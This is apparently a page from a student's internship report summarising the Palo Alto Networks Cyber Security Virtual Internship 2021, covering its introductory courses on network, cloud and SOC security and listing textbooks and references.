1. Introduction to Cyber Security

2. Fundamentals of Networks Security

3. Fundamentals of Cloud Security o Fundamentals of SOC (Security Operations Center)

These fundamental courses cover all the basic information and create awareness in the students
regarding security issues. The different cyber-attacks and crimes were broadly discussed and the necessary
steps to avoid such attacks and crimes were mentioned in an easy way.

New emerging technologies like Cloud Computing, Network Security, and Security operations were
discussed briefly with pictorial representations which helped the students to understand and analyze them.
The purpose of the internship is to help students pursue a career in cybersecurity, as there are not enough
professionals in the field at present.

Palo Alto Networks Cyber Security Virtual Internship 2021 helped students to understand and
analyze the latest technologies in the Cyber Security sector and it enhances the knowledge of a student on
the Cyber Security world.

Reg No : 20KD1A0516
 Pg No : 30

Textbooks
1.Nina Godbole and Sunit Belpure, Cyber Security Understanding Cyber Crimes, Computer
Forensics and Legal Perspectives, Wiley

2.B.B. Gupta, D. P. Agarwal, Haoxiang Wang, Computer and Cyber Security: Principles, Algorithm,
Applications and Perspectives, CRC Press, ISBN 9780815371335, 2018

References
1.Cyber Security Essentials, James Graham, Richard Howard and CRC Press Introduction to Cyber
Security, Chwan-Hwa(john) Wu, J.David Irwin, CRC Press T&F Group

Reg No : 20KD1A0516